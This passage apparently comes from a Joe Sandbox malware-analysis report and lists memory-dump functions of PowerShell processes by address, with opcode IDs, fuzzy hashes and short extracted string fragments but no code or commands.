                                                • API String ID:
                                                • Opcode ID: 9127541dbf79eac7831b86dd88dcb629c36fb3ae15f9f27281729d6966f56b69
                                                • Instruction ID: 55bbc0e12848b3031ecc6839c307b57060a58e170830d20dc4d9a87de047a273
                                                • Opcode Fuzzy Hash: 9127541dbf79eac7831b86dd88dcb629c36fb3ae15f9f27281729d6966f56b69
                                                • Instruction Fuzzy Hash: 1EF13A32A0EBC90FE765976888615687BE1FF65614F0901FED4ACCB1E3DE28AD45C341
                                                Function 00007FFD9BB20050 Relevance: .5, Instructions: 460COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1957587871.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9bb20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 820d792ffa94b90e322ddc180bc56a2121c853eeb83639065bdf26eb8c8c791c
                                                • Instruction ID: ddf726a14b4bd3476656fd018b830bcc19499fc1e00c2077595883e58d65ca92
                                                • Opcode Fuzzy Hash: 820d792ffa94b90e322ddc180bc56a2121c853eeb83639065bdf26eb8c8c791c
                                                • Instruction Fuzzy Hash: DBE15A32B0EB890FEBA9D76848612787BE2FF65614F5901BED06CC71E3DE18AC458341
                                                Function 00007FFD9BB20794 Relevance: .5, Instructions: 452COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1957587871.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9bb20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c27653a0437023928f4a105a6e36a42d2d064907cc591d45e623407e8c9f9fc8
                                                • Instruction ID: 00153e4475f8c66365e3167c388f63f35e56652a6ee6164c4718562aaf68d69d
                                                • Opcode Fuzzy Hash: c27653a0437023928f4a105a6e36a42d2d064907cc591d45e623407e8c9f9fc8
                                                • Instruction Fuzzy Hash: E5D16722B0EB890FE7669B6848655B47BE1FF66714B4A01FBD06CCB1E3D918AD05C381
                                                Function 00007FFD9B975AD5 Relevance: .4, Instructions: 440COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1954442618.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b13cdf4d9f20426f31d17bafdf0af6104e5710c474bcee6a2a1a1335012d0686
                                                • Instruction ID: bafc7a5633e64a515474b1eecc2c9d30f3c20675675ae332f54dcb0e9a180ab2
                                                • Opcode Fuzzy Hash: b13cdf4d9f20426f31d17bafdf0af6104e5710c474bcee6a2a1a1335012d0686
                                                • Instruction Fuzzy Hash: 13D14531B1EA8D5FEBA5AB6848A99B57BE1EF51310B0901FFD05CCB0E3DA18A9058351
                                                Function 00007FFD9BB211AA Relevance: .2, Instructions: 229COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1957587871.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9bb20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8808f54fe7d25c236a6e83f66a1eac7e191127c84ddbf426d368bb4e8fef8676
                                                • Instruction ID: f87c2ffdb22167326ad43f5edff70846bc16799cd76cc68398c03d7432a4c025
                                                • Opcode Fuzzy Hash: 8808f54fe7d25c236a6e83f66a1eac7e191127c84ddbf426d368bb4e8fef8676
                                                • Instruction Fuzzy Hash: 96610731A0FBC94FDB629B7898615A47FE0EF63214B0A01FBD498CB0E3DA196909C351
                                                Function 00007FFD9B979E64 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1954442618.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40f83fb9160c2a392bf06f6a7d597bc1258b01a307dc61f84ca6726852df80b5
                                                • Instruction ID: 07f58e7bfc8c8002bb0924fafb00cc84faec09c6788f03c8c53bb4d8e6ddbadc
                                                • Opcode Fuzzy Hash: 40f83fb9160c2a392bf06f6a7d597bc1258b01a307dc61f84ca6726852df80b5
                                                • Instruction Fuzzy Hash: 20210922B2FA8E2BF3B996AC54B917467C2EF91260B5900BAD05DC31E7ED19AC014341
                                                Function 00007FFD9B8ACD24 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0f52964c3dafaf4194906e95b4fa12ad9eaf3d2d88252cfddf99cc1a8eeda01
                                                • Instruction ID: a609df9e7e2a1cf980d349effd6f1cf4d44b3f273fd891b8e2931dbfb478bf89
                                                • Opcode Fuzzy Hash: d0f52964c3dafaf4194906e95b4fa12ad9eaf3d2d88252cfddf99cc1a8eeda01
                                                • Instruction Fuzzy Hash: A0310130A1A64E8EFBB4AF64CC29BF936D4FF49319F410139D44D861A2CA386A55CF25
                                                Function 00007FFD9B97189F Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1954442618.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c850abcff875bdc7a1bb57dbeb91d98812937e5f9244499dfb845b4fe4732c60
                                                • Instruction ID: 0da455c89e461b6478a8ea1dc955a9ae94f0f443345de587fe6ff47d355cdc90
                                                • Opcode Fuzzy Hash: c850abcff875bdc7a1bb57dbeb91d98812937e5f9244499dfb845b4fe4732c60
                                                • Instruction Fuzzy Hash: C6213752F1F7CA1FE365A77828A51A42BD1EF5A658B0940FFC099CB1E3DC1D1C068312
                                                Function 00007FFD9B8A3945 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45

                                                Executed Functions

                                                Function 0739A020 Relevance: 32.4, Strings: 25, Instructions: 1147COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$W$tPdq$tPdq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-1491650237
                                                • Opcode ID: 4df0b2fd8549fbde6887353ebf5418cd298e87185f91f3db05611094109014ba
                                                • Instruction ID: dd4dd1cec1d502752f037702a93a198c7df7d02567d515e2ee741f2a1f17d47e
                                                • Opcode Fuzzy Hash: 4df0b2fd8549fbde6887353ebf5418cd298e87185f91f3db05611094109014ba
                                                • Instruction Fuzzy Hash: 899291F0A002199FEF14DB68D851BAAFBF2AB85301F14C1BAD9099B781DB31DD41CB91
                                                Function 07395A58 Relevance: 20.6, Strings: 16, Instructions: 608COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$84"l$84"l$tPdq$tPdq$$dq$$dq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-686184735
                                                • Opcode ID: bc0036b00c2a8998aa594adf0b2e9603f9aced1a3c1469d374b55a547d0af196
                                                • Instruction ID: 3bdeb34954e6a0722ab59ea56c8d9e93895e973c66794af023ed42d8d819e5f5
                                                • Opcode Fuzzy Hash: bc0036b00c2a8998aa594adf0b2e9603f9aced1a3c1469d374b55a547d0af196
                                                • Instruction Fuzzy Hash: BD1219B1705246DFDF168F28C85166ABBB2AF85311F2480BAD84DCF2D2DB31C995C7A1
                                                Function 07398FB0 Relevance: 15.6, Strings: 12, Instructions: 576COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l$(f$l$(f$l$(f$l$(f$l$(f$l$(f$l$4'dq$4'dq$tPdq$tPdq
                                                • API String ID: 0-3025871430
                                                • Opcode ID: f6a23be366b1fc5b48ea490de5bab924742d56be6551d7d8d718bdadc410a433
                                                • Instruction ID: 907f2bda3c9eb659fe3b741cd81042520df315f57e38bcde016c95e2930bfa50
                                                • Opcode Fuzzy Hash: f6a23be366b1fc5b48ea490de5bab924742d56be6551d7d8d718bdadc410a433
                                                • Instruction Fuzzy Hash: 6412B3F1A102199FEF249B68C851B6ABBE6AFC9311F14C47ED8499B740DB31EC41CB91
                                                Function 07397F90 Relevance: 13.5, Strings: 10, Instructions: 971COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l$(f$l$(f$l$(f$l$(f$l$(f$l$(f$l$4'dq$4'dq
                                                • API String ID: 0-3512292919
                                                • Opcode ID: d3fdfe45ffae3cb52ab99a6ec6ef3d8ee87b13f3202ccd46c603d75e0c8a8002
                                                • Instruction ID: aa3d12fa334e9fc6b2f00163773f96ceda42ac92608ede38b8750a6e70f6fb6c
                                                • Opcode Fuzzy Hash: d3fdfe45ffae3cb52ab99a6ec6ef3d8ee87b13f3202ccd46c603d75e0c8a8002
                                                • Instruction Fuzzy Hash: F1925FB4B00215DFDB14CB18C851BA9BBB2BF8A304F54C0A5D90DAB751CB76ED858F91
                                                Function 07397F8B Relevance: 8.3, Strings: 6, Instructions: 761COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l$(f$l$(f$l$(f$l$4'dq
                                                • API String ID: 0-4141477937
                                                • Opcode ID: 71044df1e6c1d708d1f07cdc36fa97122abd3a00becced781a2b3323d0fee813
                                                • Instruction ID: 402dce1f43ef8b79ddd4b3e9feb4ae7e43fa9b964e878327ea9478d22eb6847f
                                                • Opcode Fuzzy Hash: 71044df1e6c1d708d1f07cdc36fa97122abd3a00becced781a2b3323d0fee813
                                                • Instruction Fuzzy Hash: A2723DB4A00215DFEB14CB18C851BA9BBB2BF89314F54C0A5D90DAB391CB76ED85CF91
                                                Function 07399A40 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq
                                                • API String ID: 0-1060643940
                                                • Opcode ID: 54d839398e9a7ba46efbe237f0b91045f512db32ea4a6e5cd8da8b1df9ac6944
                                                • Instruction ID: df6d86f0842cfd7d7f640a4e168b1e52b496d61f7cdc2f2e489d837c9597249f
                                                • Opcode Fuzzy Hash: 54d839398e9a7ba46efbe237f0b91045f512db32ea4a6e5cd8da8b1df9ac6944
                                                • Instruction Fuzzy Hash: 38D18CB0A002099FDB18DBA9C455BAEBBF2ABC8305F10C469D9096F395CB75EC45CF91
                                                Function 073933E0 Relevance: 5.6, Strings: 4, Instructions: 581COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq
                                                • API String ID: 0-2296240322
                                                • Opcode ID: ee94f371ddb3c6a0cc4018519634ec125e4b4bd74d00b6522c38273b938577bd
                                                • Instruction ID: 727c8022f1e3e047988228c78ff6950d7b7024e9daa38f8b7a90a0519a20cd97
                                                • Opcode Fuzzy Hash: ee94f371ddb3c6a0cc4018519634ec125e4b4bd74d00b6522c38273b938577bd
                                                • Instruction Fuzzy Hash: 161225F1B082159FEF199B78C81176ABBE2AFC6321F14C07AD909CB691DB31C945C7A1
                                                Function 0739A69B Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l$4'dq$4'dq
                                                • API String ID: 0-3858757454
                                                • Opcode ID: 2d4318dd73b3477ef3c5a71516ad46ec139454cc38d5076a60a3cc9686272d0b
                                                • Instruction ID: c613dfd44b3d86235ba915b6434722195537e7e291fd55becf374a9d4bfb48d5
                                                • Opcode Fuzzy Hash: 2d4318dd73b3477ef3c5a71516ad46ec139454cc38d5076a60a3cc9686272d0b
                                                • Instruction Fuzzy Hash: 4AF191B0A002199FDB14DB68C951BAEBBF2AB84304F11C1A5D90DAF795CB71ED81CF91
                                                Function 07397B88 Relevance: 5.3, Strings: 4, Instructions: 275COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l$(f$l$(f$l
                                                • API String ID: 0-1234685032
                                                • Opcode ID: 907cdb3bbd6128b1baddf1702800031cd0caf3397b69a99ab7c58ec41f0bd98e
                                                • Instruction ID: c8fb26204e609a86dae276f503a6b6f1095d23661db7b4332e66a35c2f19a565
                                                • Opcode Fuzzy Hash: 907cdb3bbd6128b1baddf1702800031cd0caf3397b69a99ab7c58ec41f0bd98e
                                                • Instruction Fuzzy Hash: 93A17CF0B10205DBEB18DB68C455BAEBBE2AB88305F10C069D909AF7D5DB75EC41CB91
                                                Function 0739B980 Relevance: 4.2, Strings: 3, Instructions: 493COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$$dq
                                                • API String ID: 0-3750620159
                                                • Opcode ID: ff6d24c3a78cc8d4950ce70c268d1d4be0430175e4b2530f568b791d4a1a91e0
                                                • Instruction ID: 9a4b0b978b63dabad7155921674485b4e5f3c52fe24360f5a37819460f43df2f
                                                • Opcode Fuzzy Hash: ff6d24c3a78cc8d4950ce70c268d1d4be0430175e4b2530f568b791d4a1a91e0
                                                • Instruction Fuzzy Hash: 14F135F1B0020A9FDF248F68E8516AAFBE6AF85311F14C47AD90DCB691DB31D941CB91
                                                Function 07399A21 Relevance: 4.0, Strings: 3, Instructions: 286COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq
                                                • API String ID: 0-2431816566
                                                • Opcode ID: c9671d1bb5dbe511c9c2146976f8bbbb2f317e1baac104554ca8d4b868305d8b
                                                • Instruction ID: eef677a3e04dc2b46df7d878606b559b8ae0e2c347ce3be7a7bfc72e514605af
                                                • Opcode Fuzzy Hash: c9671d1bb5dbe511c9c2146976f8bbbb2f317e1baac104554ca8d4b868305d8b
                                                • Instruction Fuzzy Hash: B2B19DB0A00205DFDF18DB68C885BAABBF2ABC8305F14C169D9096F395CB75B845CF91
                                                Function 07399AE0 Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq
                                                • API String ID: 0-2431816566
                                                • Opcode ID: 3d3ff8ed32dd3264de28c58ff63fcbf2f350062bfb185219b1459cadbbbe61d2
                                                • Instruction ID: 68638cecfa2fa13744c8d4518ec65c4e2ebca8eda30fc515049082c504ef18be
                                                • Opcode Fuzzy Hash: 3d3ff8ed32dd3264de28c58ff63fcbf2f350062bfb185219b1459cadbbbe61d2
                                                • Instruction Fuzzy Hash: 8E817BB0A00205DFEF14DB98C585BAEBBA2ABC8305F14C169D9096F385CB75BC46CF91
                                                Function 07390A80 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $dq$$dq$$dq
                                                • API String ID: 0-2861643491
                                                • Opcode ID: 2be18b301067d80ddf45b57746f55d03fb5d6c75cf7d62e513bce72a8dbaf111
                                                • Instruction ID: 3821cc7c8676fe0b453a43339a2a5c6c888db630eaf4f39b1b4d712e1c1adb71
                                                • Opcode Fuzzy Hash: 2be18b301067d80ddf45b57746f55d03fb5d6c75cf7d62e513bce72a8dbaf111
                                                • Instruction Fuzzy Hash: F741D6B2B002279BDF189E6999412ABF7E5AFC4214B24853ACD0DEB241DA31DA41C7E1
                                                Function 07390F48 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $dq$$dq$$dq
                                                • API String ID: 0-2861643491
                                                • Opcode ID: 3af5fe524c8113d92ce91095e2c2f1a7349144cd5f772b0f1fc601894fddf2c1
                                                • Instruction ID: 19986fc7d9ba2404346c18a680f8529cbc77e943b2c337bf3fc7a39d2a83f205
                                                • Opcode Fuzzy Hash: 3af5fe524c8113d92ce91095e2c2f1a7349144cd5f772b0f1fc601894fddf2c1
                                                • Instruction Fuzzy Hash: ED2188F130030B5BFF6859698881737B6DA9BC4711F34803AA90EDB3C1EE76D9418362
                                                Function 07398B90 Relevance: 3.0, Strings: 2, Instructions: 500COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$4'dq
                                                • API String ID: 0-3724089049
                                                • Opcode ID: 9bb489b9a13b7b4fec06390c596909cec1e8a4619427426a39b8569620f1f51f
                                                • Instruction ID: a289aba0ab42a8cd27a86bba681a55b6987bf10d0a2ddcd69234d29b3c586f5a
                                                • Opcode Fuzzy Hash: 9bb489b9a13b7b4fec06390c596909cec1e8a4619427426a39b8569620f1f51f
                                                • Instruction Fuzzy Hash: 10225FB4A00215DFEB14CB18C851B99BBB2FB8A314F54C0A5D90DAB391CB76ED85CF91
                                                Function 07397B68 Relevance: 2.8, Strings: 2, Instructions: 255COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l
                                                • API String ID: 0-621886165
                                                • Opcode ID: 5e47d0fac2c3d0c69574a898e24c644e2d7f80326e54767f4cc439e6d6595019
                                                • Instruction ID: f49be415e3a34e810b968768eb756e66d246a6b83dc8d7865a783b90d0a5860e
                                                • Opcode Fuzzy Hash: 5e47d0fac2c3d0c69574a898e24c644e2d7f80326e54767f4cc439e6d6595019
                                                • Instruction Fuzzy Hash: A7A19EF0A10205EFEB18DB64C445BAABBF2AF89314F54C069D9096F7D2CB75AC41CB91
                                                Function 07390F2C Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $dq$$dq
                                                • API String ID: 0-2340669324
                                                • Opcode ID: 8488b15f69066dd462ff356886b1e95f472d55e035f574e1a722e259b571e89c
                                                • Instruction ID: 9db450958ea0a4e483c5d250c771884dd8f57b8fa202b784e52654767c0501b8
                                                • Opcode Fuzzy Hash: 8488b15f69066dd462ff356886b1e95f472d55e035f574e1a722e259b571e89c
                                                • Instruction Fuzzy Hash: 8E21ADF12093876BFF35092588817637FA59F82310F24407F994DDB2C2E6399580C362
                                                Function 07390A60 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $dq$$dq
                                                • API String ID: 0-2340669324
                                                • Opcode ID: b1a2c612b00fc3698d3bbdb5d771c8542c89d615d3f1208ce735f56d0b61728e
                                                • Instruction ID: 19288df740a9d29b559514b0ad3b4a4aa8b0dda6ab1c46d14bf7d27456c9bad4
                                                • Opcode Fuzzy Hash: b1a2c612b00fc3698d3bbdb5d771c8542c89d615d3f1208ce735f56d0b61728e
                                                • Instruction Fuzzy Hash: 6821D3F69053579FDF249F6499402AABBF4AF45210B2A41B7CC4CE7241D334D940C7E1
                                                Function 0739B964 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq
                                                • API String ID: 0-1167855494
                                                • Opcode ID: cae891bc662ae802a8f59493b8c6c7b32d24481f0c9630731adc59ccdac0bf56
                                                • Instruction ID: 09aa640499ad10eafc59f69991042c45492e2090cbd28cd6d3ada44a3420d62d
                                                • Opcode Fuzzy Hash: cae891bc662ae802a8f59493b8c6c7b32d24481f0c9630731adc59ccdac0bf56
                                                • Instruction Fuzzy Hash: A64147F0B042069FEF248F24E591B7AFBE29F85350F1880B6C90C9B295D736D840CBA1
                                                Function 073933C4 Relevance: .1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bedcd8dafeda35768276d3465fa8eb07df1f2cda16b75c24ae4daad41c2fc22f
                                                • Instruction ID: 7f88b4fd13ecb0cf534014f4d7e806ba3c13b872eada533685ae163c72accee1
                                                • Opcode Fuzzy Hash: bedcd8dafeda35768276d3465fa8eb07df1f2cda16b75c24ae4daad41c2fc22f
                                                • Instruction Fuzzy Hash: 204107F1A00212EFEF298F28C94166ABFE2EF89254F55C0B6D90C9B251D735DD44C7A1
                                                Function 07399E66 Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 960e53e78a24612c912ca40d84c8b26fc4922591df07c0a10fa13d58dbde00f1
                                                • Instruction ID: 1cd3aece68adb81d0428d9d91b528509ef51379e425def8eae7766f8a8093918
                                                • Opcode Fuzzy Hash: 960e53e78a24612c912ca40d84c8b26fc4922591df07c0a10fa13d58dbde00f1
                                                • Instruction Fuzzy Hash: 8331D6B0740204ABDB049769C851BAEBAE3ABC8345F50C069EA096F3C5CFB5AC458F91
                                                Function 07390E18 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5121a79afe97ba91bc9732d2a3be4fd8bac2fd884bbe48c442a7ec84b682bc5e
                                                • Instruction ID: 26acecd236f0cd04f4378474a26d92aba8479d8ee2f581daf422f079645e572c
                                                • Opcode Fuzzy Hash: 5121a79afe97ba91bc9732d2a3be4fd8bac2fd884bbe48c442a7ec84b682bc5e
                                                • Instruction Fuzzy Hash: BE213CF170031BA7EF285A69844173BB69A9FC5715F24843A990DDA6C0DE75D9418360
                                                Function 07390DFC Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
